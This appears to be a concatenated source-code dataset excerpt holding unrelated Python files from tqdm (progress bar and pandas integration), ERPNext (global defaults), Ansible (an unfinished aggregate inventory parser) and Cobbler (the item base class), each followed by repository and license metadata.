cls._lock = lock
@classmethod
def get_lock(cls):
"""Get the global lock. Construct it if it does not exist."""
if not hasattr(cls, '_lock'):
cls._lock = TqdmDefaultWriteLock()
return cls._lock
@classmethod
def pandas(tclass, *targs, **tkwargs):
"""
Registers the given `tqdm` class with
pandas.core.
( frame.DataFrame
| series.Series
| groupby.(generic.)DataFrameGroupBy
| groupby.(generic.)SeriesGroupBy
).progress_apply
A new instance will be create every time `progress_apply` is called,
and each instance will automatically close() upon completion.
Parameters
----------
targs, tkwargs : arguments for the tqdm instance
Examples
--------
>>> import pandas as pd
>>> import numpy as np
>>> from tqdm import tqdm
>>> from tqdm.gui import tqdm as tqdm_gui
>>>
>>> df = pd.DataFrame(np.random.randint(0, 100, (100000, 6)))
>>> tqdm.pandas(ncols=50) # can use tqdm_gui, optional kwargs, etc
>>> # Now you can use `progress_apply` instead of `apply`
>>> df.groupby(0).progress_apply(lambda x: x**2)
References
----------
https://stackoverflow.com/questions/18603270/
progress-indicator-during-pandas-operations-python
"""
from pandas.core.frame import DataFrame
from pandas.core.series import Series
try:
from pandas import Panel
except ImportError: # TODO: pandas>0.25.2
Panel = None
try: # pandas>=0.18.0
from pandas.core.window import _Rolling_and_Expanding
except ImportError: # pragma: no cover
_Rolling_and_Expanding = None
try: # pandas>=0.25.0
from pandas.core.groupby.generic import DataFrameGroupBy, \
SeriesGroupBy # , NDFrameGroupBy
except ImportError:
try: # pandas>=0.23.0
from pandas.core.groupby.groupby import DataFrameGroupBy, \
SeriesGroupBy
except ImportError:
from pandas.core.groupby import DataFrameGroupBy, \
SeriesGroupBy
try: # pandas>=0.23.0
from pandas.core.groupby.groupby import GroupBy
except ImportError:
from pandas.core.groupby import GroupBy
try: # pandas>=0.23.0
from pandas.core.groupby.groupby import PanelGroupBy
except ImportError:
try:
from pandas.core.groupby import PanelGroupBy
except ImportError: # pandas>=0.25.0
PanelGroupBy = None
deprecated_t = [tkwargs.pop('deprecated_t', None)]
def inner_generator(df_function='apply'):
def inner(df, func, *args, **kwargs):
"""
Parameters
----------
df : (DataFrame|Series)[GroupBy]
Data (may be grouped).
func : function
To be applied on the (grouped) data.
**kwargs : optional
Transmitted to `df.apply()`.
"""
# Precompute total iterations
total = tkwargs.pop("total", getattr(df, 'ngroups', None))
if total is None: # not grouped
if df_function == 'applymap':
total = df.size
elif isinstance(df, Series):
total = len(df)
elif _Rolling_and_Expanding is None or \
not isinstance(df, _Rolling_and_Expanding):
# DataFrame or Panel
axis = kwargs.get('axis', 0)
if axis == 'index':
axis = 0
elif axis == 'columns':
axis = 1
# when axis=0, total is shape[axis1]
total = df.size // df.shape[axis]
# Init bar
if deprecated_t[0] is not None:
t = deprecated_t[0]
deprecated_t[0] = None
else:
t = tclass(*targs, total=total, **tkwargs)
if len(args) > 0:
# *args intentionally not supported (see #244, #299)
TqdmDeprecationWarning(
"Except func, normal arguments are intentionally" +
" not supported by" +
" `(DataFrame|Series|GroupBy).progress_apply`." +
" Use keyword arguments instead.",
fp_write=getattr(t.fp, 'write', sys.stderr.write))
try:
func = df._is_builtin_func(func)
except TypeError:
pass
# Define bar updating wrapper
def wrapper(*args, **kwargs):
# update tbar correctly
# it seems `pandas apply` calls `func` twice
# on the first column/row to decide whether it can
# take a fast or slow code path; so stop when t.total==t.n
t.update(n=1 if not t.total or t.n < t.total else 0)
return func(*args, **kwargs)
# Apply the provided function (in **kwargs)
# on the df using our wrapper (which provides bar updating)
result = getattr(df, df_function)(wrapper, **kwargs)
# Close bar and return pandas calculation result
t.close()
return result
return inner
# Monkeypatch pandas to provide easy methods
# Enable custom tqdm progress in pandas!
Series.progress_apply = inner_generator()
SeriesGroupBy.progress_apply = inner_generator()
Series.progress_map = inner_generator('map')
SeriesGroupBy.progress_map = inner_generator('map')
DataFrame.progress_apply = inner_generator()
DataFrameGroupBy.progress_apply = inner_generator()
DataFrame.progress_applymap = inner_generator('applymap')
if Panel is not None:
Panel.progress_apply = inner_generator()
if PanelGroupBy is not None:
PanelGroupBy.progress_apply = inner_generator()
GroupBy.progress_apply = inner_generator()
GroupBy.progress_aggregate = inner_generator('aggregate')
GroupBy.progress_transform = inner_generator('transform')
if _Rolling_and_Expanding is not None: # pragma: no cover
_Rolling_and_Expanding.progress_apply = inner_generator()
def __init__(self, iterable=None, desc=None, total=None, leave=True,
file=None, ncols=None, mininterval=0.1, maxinterval=10.0,
miniters=None, ascii=None, disable=False, unit='it',
unit_scale=False, dynamic_ncols=False, smoothing=0.3,
bar_format=None, initial=0, position=None, postfix=None,
unit_divisor=1000, write_bytes=None, lock_args=None,
gui=False, **kwargs):
"""
Parameters
----------
iterable : iterable, optional
Iterable to decorate with a progressbar.
Leave blank to manually manage the updates.
desc : str, optional
Prefix for the progressbar.
total : int or float, optional
The number of expected iterations. If unspecified,
len(iterable) is used if possible. If float("inf") or as a last
resort, only basic progress statistics are displayed
(no ETA, no progressbar).
If `gui` is True and this parameter needs subsequent updating,
specify an initial arbitrary large positive number,
e.g. 9e9.
leave : bool, optional
If [default: True], keeps all traces of the progressbar
upon termination of iteration.
If `None`, will leave only if `position` is `0`.
file : `io.TextIOWrapper` or `io.StringIO`, optional
Specifies where to output the progress messages
(default: sys.stderr). Uses `file.write(str)` and `file.flush()`
methods. For encoding, see `write_bytes`.
ncols : int, optional
The width of the entire output message. If specified,
dynamically resizes the progressbar to stay within this bound.
If unspecified, attempts to use environment width. The
fallback is a meter width of 10 and no limit for the counter and
statistics. If 0, will not print any meter (only stats).
mininterval : float, optional
Minimum progress display update interval [default: 0.1] seconds.
maxinterval : float, optional
Maximum progress display update interval [default: 10] seconds.
Automatically adjusts `miniters` to correspond to `mininterval`
after long display update lag. Only works if `dynamic_miniters`
or monitor thread is enabled.
miniters : int or float, optional
Minimum progress display update interval, in iterations.
If 0 and `dynamic_miniters`, will automatically adjust to equal
`mininterval` (more CPU efficient, good for tight loops).
If > 0, will skip display of specified number of iterations.
Tweak this and `mininterval` to get very efficient loops.
If your progress is erratic with both fast and slow iterations
(network, skipping items, etc) you should set miniters=1.
ascii : bool or str, optional
If unspecified or False, use unicode (smooth blocks) to fill
the meter. The fallback is to use ASCII characters " 123456789#".
disable : bool, optional
Whether to disable the entire progressbar wrapper
[default: False]. If set to None, disable on non-TTY.
unit : str, optional
String that will be used to define the unit of each iteration
[default: it].
unit_scale : bool or int or float, optional
If 1 or True, the number of iterations will be reduced/scaled
automatically and a metric prefix following the
International System of Units standard will be added
(kilo, mega, etc.) [default: False]. If any other non-zero
number, will scale `total` and `n`.
dynamic_ncols : bool, optional
If set, constantly alters `ncols` to the environment (allowing
for window resizes) [default: False].
smoothing : float, optional
Exponential moving average smoothing factor for speed estimates
(ignored in GUI mode). Ranges from 0 (average speed) to 1
(current/instantaneous speed) [default: 0.3].
bar_format : str, optional
Specify a custom bar string formatting. May impact performance.
[default: '{l_bar}{bar}{r_bar}'], where
l_bar='{desc}: {percentage:3.0f}%|' and
r_bar='| {n_fmt}/{total_fmt} [{elapsed}<{remaining}, '
'{rate_fmt}{postfix}]'
Possible vars: l_bar, bar, r_bar, n, n_fmt, total, total_fmt,
percentage, elapsed, elapsed_s, ncols, desc, unit,
rate, rate_fmt, rate_noinv, rate_noinv_fmt,
rate_inv, rate_inv_fmt, postfix, unit_divisor,
remaining, remaining_s.
Note that a trailing ": " is automatically removed after {desc}
if the latter is empty.
initial : int or float, optional
The initial counter value. Useful when restarting a progress
bar [default: 0]. If using float, consider specifying `{n:.3f}`
or similar in `bar_format`, or specifying `unit_scale`.
position : int, optional
Specify the line offset to print this bar (starting from 0)
Automatic if unspecified.
Useful to manage multiple bars at once (eg, from threads).
postfix : dict or *, optional
Specify additional stats to display at the end of the bar.
Calls `set_postfix(**postfix)` if possible (dict).
unit_divisor : float, optional
[default: 1000], ignored unless `unit_scale` is True.
write_bytes : bool, optional
If (default: None) and `file` is unspecified,
bytes will be written in Python 2. If `True` will also write
bytes. In all other cases will default to unicode.
lock_args : tuple, optional
Passed to `refresh` for intermediate output
(initialisation, iterating, and updating).
gui : bool, optional
WARNING: internal parameter - do not use.
Use tqdm.gui.tqdm(...) instead. If set, will attempt to use
matplotlib animations for a graphical output [default: False].
Returns
-------
out : decorated iterator.
"""
if write_bytes is None:
write_bytes = file is None and sys.version_info < (3,)
if file is None:
file = sys.stderr
if write_bytes:
# Despite coercing unicode into bytes, py2 sys.std* streams
# should have bytes written to them.
file = SimpleTextIOWrapper(
file, encoding=getattr(file, 'encoding', None) or 'utf-8')
if disable is None and hasattr(file, "isatty") and not file.isatty():
disable = True
if total is None and iterable is not None:
try:
total = len(iterable)
except (TypeError, AttributeError):
total = None
if total == float("inf"):
# Infinite iterations, behave same as unknown
total = None
if disable:
self.iterable = iterable
self.disable = disable
with self._lock:
self.pos = self._get_free_pos(self)
self._instances.remove(self)
self.n = initial
self.total = total
return
if kwargs:
self.disable = True
with self._lock:
self.pos = self._get_free_pos(self)
self._instances.remove(self)
raise (
TqdmDeprecationWarning(
"`nested` is deprecated and automated.\n"
"Use `position` instead for manual control.\n",
fp_write=getattr(file, 'write', sys.stderr.write))
if "nested" in kwargs else
TqdmKeyError("Unknown argument(s): " + str(kwargs)))
# Preprocess the arguments
if ((ncols is None) and (file in (sys.stderr, sys.stdout))) or \
dynamic_ncols: # pragma: no cover
if dynamic_ncols:
dynamic_ncols = _environ_cols_wrapper()
if dynamic_ncols:
ncols = dynamic_ncols(file)
else:
_dynamic_ncols = _environ_cols_wrapper()
if _dynamic_ncols:
ncols = _dynamic_ncols(file)
if miniters is None:
miniters = 0
dynamic_miniters = True
else:
dynamic_miniters = False
if mininterval is None:
mininterval = 0
if maxinterval is None:
maxinterval = 0
if ascii is None:
ascii = not _supports_unicode(file)
if bar_format and not ((ascii is True) or _is_ascii(ascii)):
# Convert bar format into unicode since terminal uses unicode
bar_format = _unicode(bar_format)
if smoothing is None:
smoothing = 0
# Store the arguments
self.iterable = iterable
self.desc = desc or ''
self.total = total
self.leave = leave
self.fp = file
self.ncols = ncols
self.mininterval = mininterval
self.maxinterval = maxinterval
self.miniters = miniters
self.dynamic_miniters = dynamic_miniters
self.ascii = ascii
self.disable = disable
self.unit = unit
self.unit_scale = unit_scale
self.unit_divisor = unit_divisor
self.lock_args = lock_args
self.gui = gui
self.dynamic_ncols = dynamic_ncols
self.smoothing = smoothing
self.avg_time = None
self._time = time
self.bar_format = bar_format
self.postfix = None
if postfix:
try:
self.set_postfix(refresh=False, **postfix)
except TypeError:
self.postfix = postfix
# Init the iterations counters
self.last_print_n = initial
self.n = initial
# if nested, at initial sp() call we replace '\r' by '\n' to
# not overwrite the outer progress bar
with self._lock:
if position is None:
self.pos = self._get_free_pos(self)
else: # mark fixed positions as negative
self.pos = -position
if not gui:
# Initialize the screen printer
self.sp = self.status_printer(self.fp)
self.refresh(lock_args=self.lock_args)
# Init the time counter
self.last_print_t = self._time()
# NB: Avoid race conditions by setting start_t at the very end of init
self.start_t = self.last_print_t
def __bool__(self):
if self.total is not None:
return self.total > 0
if self.iterable is None:
raise TypeError('bool() undefined when iterable == total == None')
return bool(self.iterable)
def __nonzero__(self):
return self.__bool__()
def __len__(self):
return self.total if self.iterable is None else \
(self.iterable.shape[0] if hasattr(self.iterable, "shape")
else len(self.iterable) if hasattr(self.iterable, "__len__")
else getattr(self, "total", None))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.close()
except AttributeError:
# maybe eager thread cleanup upon external error
if (exc_type, exc_value, traceback) == (None, None, None):
raise
warn("AttributeError ignored", TqdmWarning, stacklevel=2)
def __del__(self):
self.close()
def __repr__(self):
return self.format_meter(**self.format_dict)
@property
def _comparable(self):
return abs(getattr(self, "pos", 1 << 31))
def __hash__(self):
return id(self)
def __iter__(self):
"""Backward-compatibility to use: for x in tqdm(iterable)"""
# Inlining instance variables as locals (speed optimisation)
iterable = self.iterable
# If the bar is disabled, then just walk the iterable
# (note: keep this check outside the loop for performance)
if self.disable:
for obj in iterable:
yield obj
return
mininterval = self.mininterval
maxinterval = self.maxinterval
miniters = self.miniters
dynamic_miniters = self.dynamic_miniters
last_print_t = self.last_print_t
last_print_n = self.last_print_n
n = self.n
smoothing = self.smoothing
avg_time = self.avg_time
time = self._time
if not hasattr(self, 'sp'):
raise TqdmDeprecationWarning(
"Please use `tqdm.gui.tqdm(...)` instead of"
" `tqdm(..., gui=True)`\n",
fp_write=getattr(self.fp, 'write', sys.stderr.write))
for obj in iterable:
yield obj
# Update and possibly print the progressbar.
# Note: does not call self.update(1) for speed optimisation.
n += 1
# check counter first to avoid calls to time()
if n - last_print_n >= self.miniters:
miniters = self.miniters # watch monitoring thread changes
delta_t = time() - last_print_t
if delta_t >= mininterval:
cur_t = time()
delta_it = n - last_print_n
# EMA (not just overall average)
if smoothing and delta_t and delta_it:
rate = delta_t / delta_it
avg_time = self.ema(rate, avg_time, smoothing)
self.avg_time = avg_time
self.n = n
self.refresh(lock_args=self.lock_args)
# If no `miniters` was specified, adjust automatically
# to the max iteration rate seen so far between 2 prints
if dynamic_miniters:
if maxinterval and delta_t >= maxinterval:
# Adjust miniters to time interval by rule of 3
if mininterval:
# Set miniters to correspond to mininterval
miniters = delta_it * mininterval / delta_t
else:
# Set miniters to correspond to maxinterval
miniters = delta_it * maxinterval / delta_t
elif smoothing:
# EMA-weight miniters to converge
# towards the timeframe of mininterval
rate = delta_it
if mininterval and delta_t:
rate *= mininterval / delta_t
miniters = self.ema(rate, miniters, smoothing)
else:
# Maximum nb of iterations between 2 prints
miniters = max(miniters, delta_it)
# Store old values for next call
self.n = self.last_print_n = last_print_n = n
self.last_print_t = last_print_t = cur_t
self.miniters = miniters
# Closing the progress bar.
# Update some internal variables for close().
self.last_print_n = last_print_n
self.n = n
self.miniters = miniters
self.close()
def update(self, n=1):
"""
Manually update the progress bar, useful for streams
such as reading files.
E.g.:
>>> t = tqdm(total=filesize) # Initialise
>>> for current_buffer in stream:
... ...
... t.update(len(current_buffer))
>>> t.close()
The last line is highly recommended, but possibly not necessary if
`t.update()` will be called in such a way that `filesize` will be
exactly reached and printed.
Parameters
----------
n : int or float, optional
Increment to add to the internal counter of iterations
[default: 1]. If using float, consider specifying `{n:.3f}`
or similar in `bar_format`, or specifying `unit_scale`.
"""
# N.B.: see __iter__() for more comments.
if self.disable:
return
if n < 0:
self.last_print_n += n # for auto-refresh logic to work
self.n += n
# check counter first to reduce calls to time()
if self.n - self.last_print_n >= self.miniters:
delta_t = self._time() - self.last_print_t
if delta_t >= self.mininterval:
cur_t = self._time()
delta_it = self.n - self.last_print_n # >= n
# elapsed = cur_t - self.start_t
# EMA (not just overall average)
if self.smoothing and delta_t and delta_it:
rate = delta_t / delta_it
self.avg_time = self.ema(
rate, self.avg_time, self.smoothing)
if not hasattr(self, "sp"):
raise TqdmDeprecationWarning(
"Please use `tqdm.gui.tqdm(...)`"
" instead of `tqdm(..., gui=True)`\n",
fp_write=getattr(self.fp, 'write', sys.stderr.write))
self.refresh(lock_args=self.lock_args)
# If no `miniters` was specified, adjust automatically to the
# maximum iteration rate seen so far between two prints.
# e.g.: After running `tqdm.update(5)`, subsequent
# calls to `tqdm.update()` will only cause an update after
# at least 5 more iterations.
if self.dynamic_miniters:
if self.maxinterval and delta_t >= self.maxinterval:
if self.mininterval:
self.miniters = delta_it * self.mininterval \
/ delta_t
else:
self.miniters = delta_it * self.maxinterval \
/ delta_t
elif self.smoothing:
self.miniters = self.smoothing * delta_it * \
(self.mininterval / delta_t
if self.mininterval and delta_t
else 1) + \
(1 - self.smoothing) * self.miniters
else:
self.miniters = max(self.miniters, delta_it)
# Store old values for next call
self.last_print_n = self.n
self.last_print_t = cur_t
def close(self):
"""Cleanup and (if leave=False) close the progressbar."""
if self.disable:
return
# Prevent multiple closures
self.disable = True
# decrement instance pos and remove from internal set
pos = abs(self.pos)
self._decr_instances(self)
# GUI mode
if not hasattr(self, "sp"):
return
# annoyingly, _supports_unicode isn't good enough
def fp_write(s):
self.fp.write(_unicode(s))
try:
fp_write('')
except ValueError as e:
if 'closed' in str(e):
return
raise # pragma: no cover
leave = pos == 0 if self.leave is None else self.leave
with self._lock:
if leave:
# stats for overall rate (no weighted average)
self.avg_time = None
self.display(pos=0)
fp_write('\n')
else:
self.display(msg='', pos=pos)
if not pos:
fp_write('\r')
def clear(self, nolock=False):
"""Clear current bar display."""
if self.disable:
return
if not nolock:
self._lock.acquire()
self.moveto(abs(self.pos))
self.sp('')
self.fp.write('\r') # place cursor back at the beginning of line
self.moveto(-abs(self.pos))
if not nolock:
self._lock.release()
def refresh(self, nolock=False, lock_args=None):
"""
Force refresh the display of this bar.
Parameters
----------
nolock : bool, optional
If `True`, does not lock.
If [default: `False`]: calls `acquire()` on internal lock.
lock_args : tuple, optional
Passed to internal lock's `acquire()`.
If specified, will only `display()` if `acquire()` returns `True`.
"""
if self.disable:
return
if not nolock:
if lock_args:
if not self._lock.acquire(*lock_args):
return False
else:
self._lock.acquire()
self.display()
if not nolock:
self._lock.release()
return True
def unpause(self):
"""Restart tqdm timer from last print time."""
cur_t = self._time()
self.start_t += cur_t - self.last_print_t
self.last_print_t = cur_t
def reset(self, total=None):
"""
Resets to 0 iterations for repeated use.
Consider combining with `leave=True`.
Parameters
----------
total : int or float, optional. Total to use for the new bar.
"""
self.last_print_n = self.n = 0
self.last_print_t = self.start_t = self._time()
if total is not None:
self.total = total
self.refresh()
def set_description(self, desc=None, refresh=True):
"""
Set/modify description of the progress bar.
Parameters
----------
desc : str, optional
refresh : bool, optional
Forces refresh [default: True].
"""
self.desc = desc + ': ' if desc else ''
if refresh:
self.refresh()
def set_description_str(self, desc=None, refresh=True):
"""Set/modify description without ': ' appended."""
self.desc = desc or ''
if refresh:
self.refresh()
def set_postfix(self, ordered_dict=None, refresh=True, **kwargs):
"""
Set/modify postfix (additional stats)
with automatic formatting based on datatype.
Parameters
----------
ordered_dict : dict or OrderedDict, optional
refresh : bool, optional
Forces refresh [default: True].
kwargs : dict, optional
"""
# Sort in alphabetical order to be more deterministic
postfix = _OrderedDict([] if ordered_dict is None else ordered_dict)
for key in sorted(kwargs.keys()):
postfix[key] = kwargs[key]
# Preprocess stats according to datatype
for key in postfix.keys():
# Number: limit the length of the string
if isinstance(postfix[key], Number):
postfix[key] = self.format_num(postfix[key])
# Else for any other type, try to get the string conversion
elif not isinstance(postfix[key], _basestring):
postfix[key] = str(postfix[key])
# Else if it's a string, don't need to preprocess anything
# Stitch together to get the final postfix
self.postfix = ', '.join(key + '=' + postfix[key].strip()
for key in postfix.keys())
if refresh:
self.refresh()
def set_postfix_str(self, s='', refresh=True):
"""
Postfix without dictionary expansion, similar to prefix handling.
"""
self.postfix = str(s)
if refresh:
self.refresh()
def moveto(self, n):
# TODO: private method
self.fp.write(_unicode('\n' * n + _term_move_up() * -n))
self.fp.flush()
@property
def format_dict(self):
"""Public API for read-only member access."""
return dict(
n=self.n, total=self.total,
elapsed=self._time() - self.start_t
if hasattr(self, 'start_t') else 0,
ncols=self.dynamic_ncols(self.fp)
if self.dynamic_ncols else self.ncols,
prefix=self.desc, ascii=self.ascii, unit=self.unit,
unit_scale=self.unit_scale,
rate=1 / self.avg_time if self.avg_time else None,
bar_format=self.bar_format, postfix=self.postfix,
unit_divisor=self.unit_divisor)
def display(self, msg=None, pos=None):
"""
Use `self.sp` to display `msg` in the specified `pos`.
Consider overloading this function when inheriting to use e.g.:
`self.some_frontend(**self.format_dict)` instead of `self.sp`.
Parameters
----------
msg : str, optional. What to display (default: `repr(self)`).
pos : int, optional. Position to `moveto`
(default: `abs(self.pos)`).
"""
if pos is None:
pos = abs(self.pos)
if pos:
self.moveto(pos)
self.sp(self.__repr__() if msg is None else msg)
if pos:
self.moveto(-pos)
@classmethod
@contextmanager
def wrapattr(tclass, stream, method, total=None, bytes=True, **tkwargs):
"""
stream : file-like object.
method : str, "read" or "write". The result of `read()` and
the first argument of `write()` should have a `len()`.
>>> with tqdm.wrapattr(file_obj, "read", total=file_obj.size) as fobj:
... while True:
... chunk = fobj.read(chunk_size)
... if not chunk:
... break
"""
with tclass(total=total, **tkwargs) as t:
if bytes:
t.unit = "B"
t.unit_scale = True
t.unit_divisor = 1024
yield CallbackIOWrapper(t.update, stream, method)
def trange(*args, **kwargs):
"""
A shortcut for tqdm(xrange(*args), **kwargs).
On Python3+ range is used instead of xrange.
"""
return tqdm(_range(*args), **kwargs)
|
bsd-3-clause
|
mbauskar/omnitech-demo-erpnext
|
erpnext/setup/doctype/global_defaults/global_defaults.py
|
55
|
2227
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
"""Global Defaults"""
import frappe
import frappe.defaults
from frappe.utils import cint
from frappe.custom.doctype.property_setter.property_setter import make_property_setter
keydict = {
# "key in defaults": "key in Global Defaults"
"fiscal_year": "current_fiscal_year",
'company': 'default_company',
'currency': 'default_currency',
"country": "country",
'hide_currency_symbol':'hide_currency_symbol',
'account_url':'account_url',
'disable_rounded_total': 'disable_rounded_total',
}
from frappe.model.document import Document
class GlobalDefaults(Document):
def on_update(self):
"""update defaults"""
for key in keydict:
frappe.db.set_default(key, self.get(keydict[key], ''))
# update year start date and year end date from fiscal_year
year_start_end_date = frappe.db.sql("""select year_start_date, year_end_date
from `tabFiscal Year` where name=%s""", self.current_fiscal_year)
if year_start_end_date:
ysd = year_start_end_date[0][0] or ''
yed = year_start_end_date[0][1] or ''
if ysd and yed:
frappe.db.set_default('year_start_date', ysd.strftime('%Y-%m-%d'))
frappe.db.set_default('year_end_date', yed.strftime('%Y-%m-%d'))
# enable default currency
if self.default_currency:
frappe.db.set_value("Currency", self.default_currency, "enabled", 1)
self.toggle_rounded_total()
# clear cache
frappe.clear_cache()
def get_defaults(self):
return frappe.defaults.get_defaults()
def toggle_rounded_total(self):
self.disable_rounded_total = cint(self.disable_rounded_total)
# Make property setters to hide rounded total fields
for doctype in ("Quotation", "Sales Order", "Sales Invoice", "Delivery Note"):
make_property_setter(doctype, "base_rounded_total", "hidden", self.disable_rounded_total, "Check")
make_property_setter(doctype, "base_rounded_total", "print_hide", 1, "Check")
make_property_setter(doctype, "rounded_total", "hidden", self.disable_rounded_total, "Check")
make_property_setter(doctype, "rounded_total", "print_hide", self.disable_rounded_total, "Check")
|
agpl-3.0
|
quixoten/ansible
|
lib/ansible/plugins/inventory/aggregate.py
|
237
|
2266
|
# (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#############################################
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from . import InventoryParser
#from . ini import InventoryIniParser
#from . script import InventoryScriptParser
class InventoryAggregateParser(InventoryParser):
def __init__(self, inven_sources):
self.inven_source = inven_sources
self.hosts = dict()
self.groups = dict()
def reset_parser(self):
super(InventoryAggregateParser, self).reset_parser()
def parse(self, refresh=False):
# InventoryDirectoryParser is a InventoryAggregateParser so we avoid
# a circular import by importing here
from . directory import InventoryAggregateParser
if super(InventoryAggregateParser, self).parse(refresh):
return self.parsed
for entry in self.inven_sources:
if os.path.sep in entry:
# file or directory
if os.path.isdir(entry):
parser = directory.InventoryDirectoryParser(filename=entry)
elif utils.is_executable(entry):
parser = InventoryScriptParser(filename=entry)
else:
parser = InventoryIniParser(filename=entry)
else:
# hostname
parser = HostnameParser(hostname=entry)
hosts, groups = parser.parse()
self._merge(self.hosts, hosts)
self._merge(self.groups, groups)
|
gpl-3.0
|
jmaas/cobbler
|
cobbler/items/item.py
|
1
|
18656
|
"""
Copyright 2006-2009, Red Hat, Inc and Others
Michael DeHaan <michael.dehaan AT gmail>
This software may be freely redistributed under the terms of the GNU
general public license.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA.
"""
from builtins import object
from builtins import str
import fnmatch
import pprint
from cobbler import utils
from cobbler import validate
from cobbler.cexceptions import CX, NotImplementedException
from cobbler.utils import _
# the fields has controls what data elements are part of each object. To add a new field, just add a new
# entry to the list following some conventions to be described later. You must also add a method called
# set_$fieldname. Do not write a method called get_$fieldname, that will not be called.
#
# name | default | subobject default | display name | editable? | tooltip | values ? | type
#
# name -- what the filed should be called. For the command line, underscores will be replaced with
# a hyphen programatically, so use underscores to seperate things that are seperate words
#
# default value -- when a new object is created, what is the default value for this field?
#
# subobject default -- this applies ONLY to subprofiles, and is most always set to <<inherit>>. If this
# is not item_profile.py it does not matter.
#
# display name -- how the field shows up in the web application and the "cobbler report" command
#
# editable -- should the field be editable in the CLI and web app? Almost always yes unless
# it is an internalism. Fields that are not editable are "hidden"
#
# tooltip -- the caption to be shown in the web app or in "commandname --help" in the CLI
#
# values -- for fields that have a limited set of valid options and those options are always fixed
# (such as architecture type), the list of valid options goes in this field.
#
# type -- the type of the field. Used to determine which HTML form widget is used in the web interface
#
#
# the order in which the fields appear in the web application (for all non-hidden
# fields) is defined in field_ui_info.py. The CLI sorts fields alphabetically.
#
# field_ui_info.py also contains a set of "Groups" that describe what other fields
# are associated with what other fields. This affects color coding and other
# display hints. If you add a field, please edit field_ui_info.py carefully to match.
#
# additional: see field_ui_info.py for some display hints. By default, in the
# web app, all fields are text fields unless field_ui_info.py lists the field in
# one of those dictionaries.
#
# hidden fields should not be added without just cause, explanations about these are:
#
# ctime, mtime -- times the object was modified, used internally by cobbler for API purposes
# uid -- also used for some external API purposes
# source_repos -- an artifiact of import, this is too complicated to explain on IRC so we just hide it
# for RHEL split repos, this is a list of each of them in the install tree, used to generate
# repo lines in the automatic installation file to allow installation of x>=RHEL5. Otherwise unimportant.
# depth -- used for "cobbler list" to print the tree, makes it easier to load objects from disk also
# tree_build_time -- loaded from import, this is not useful to many folks so we just hide it. Avail over API.
#
# so to add new fields
# (A) understand the above
# (B) add a field below
# (C) add a set_fieldname method
# (D) if field must be viewable/editable via web UI, add a entry in
# corresponding *_UI_FIELDS_MAPPING dictionary in field_ui_info.py.
# If field must not be displayed in a text field in web UI, also add
# an entry in corresponding USES_* list in field_ui_info.py.
#
# in general the set_field_name method should raise exceptions on invalid fields, always. There are adtl
# validation fields in is_valid to check to see that two seperate fields do not conflict, but in general
# design issues that require this should be avoided forever more, and there are few exceptions. Cobbler
# must operate as normal with the default value for all fields and not choke on the default values.
class Item(object):
"""
An Item is a serializable thing that can appear in a Collection
"""
converted_cache = {}
@classmethod
def get_from_cache(cls, ref):
return cls.converted_cache.get(ref.COLLECTION_TYPE, {}).get(ref.name)
@classmethod
def set_cache(cls, ref, value):
if ref.COLLECTION_TYPE not in cls.converted_cache:
cls.converted_cache[ref.COLLECTION_TYPE] = {}
cls.converted_cache[ref.COLLECTION_TYPE][ref.name] = value
@classmethod
def remove_from_cache(cls, ref):
cls.converted_cache.get(ref.COLLECTION_TYPE, {}).pop(ref.name, None)
TYPE_NAME = "generic"
def __init__(self, collection_mgr, is_subobject=False):
"""
Constructor. Requires a back reference to the CollectionManager object.
NOTE: is_subobject is used for objects that allow inheritance in their trees. This
inheritance refers to conceptual inheritance, not Python inheritance. Objects created
with is_subobject need to call their set_parent() method immediately after creation
and pass in a value of an object of the same type. Currently this is only supported
for profiles. Subobjects blend their data with their parent objects and only require
a valid parent name and a name for themselves, so other required options can be
gathered from items further up the cobbler tree.
distro
profile
profile <-- created with is_subobject=True
system <-- created as normal
For consistancy, there is some code supporting this in all object types, though it is only usable
(and only should be used) for profiles at this time. Objects that are children of
objects of the same type (i.e. subprofiles) need to pass this in as True. Otherwise, just
use False for is_subobject and the parent object will (therefore) have a different type.
"""
self.collection_mgr = collection_mgr
self.settings = self.collection_mgr._settings
self.clear(is_subobject) # reset behavior differs for inheritance cases
self.parent = '' # all objects by default are not subobjects
self.children = {} # caching for performance reasons, not serialized
self.log_func = self.collection_mgr.api.log
self.ctime = 0 # to be filled in by collection class
self.mtime = 0 # to be filled in by collection class
self.uid = "" # to be filled in by collection class
self.kernel_options = None
self.kernel_options_post = None
self.autoinstall_meta = None
self.fetchable_files = None
self.boot_files = None
self.template_files = None
self.name = None
self.last_cached_mtime = 0
self.cached_dict = ""
def __find_compare(self, from_search, from_obj):
if isinstance(from_obj, str):
# FIXME: fnmatch is only used for string to string comparisions
# which should cover most major usage, if not, this deserves fixing
from_obj_lower = from_obj.lower()
from_search_lower = from_search.lower()
# it's much faster to not use fnmatch if it's not needed
if '?' not in from_search_lower and '*' not in from_search_lower and '[' not in from_search_lower:
match = from_obj_lower == from_search_lower
else:
match = fnmatch.fnmatch(from_obj_lower, from_search_lower)
return match
else:
if isinstance(from_search, str):
if isinstance(from_obj, list):
from_search = utils.input_string_or_list(from_search)
for x in from_search:
if x not in from_obj:
return False
return True
if isinstance(from_obj, dict):
(junk, from_search) = utils.input_string_or_dict(from_search, allow_multiples=True)
for x in list(from_search.keys()):
y = from_search[x]
if x not in from_obj:
return False
if not (y == from_obj[x]):
return False
return True
if isinstance(from_obj, bool):
if from_search.lower() in ["true", "1", "y", "yes"]:
inp = True
else:
inp = False
if inp == from_obj:
return True
return False
raise CX(_("find cannot compare type: %s") % type(from_obj))
def get_fields(self):
"""
Get serializable fields
Must be defined in any subclass
"""
raise NotImplementedException()
def clear(self, is_subobject=False):
"""
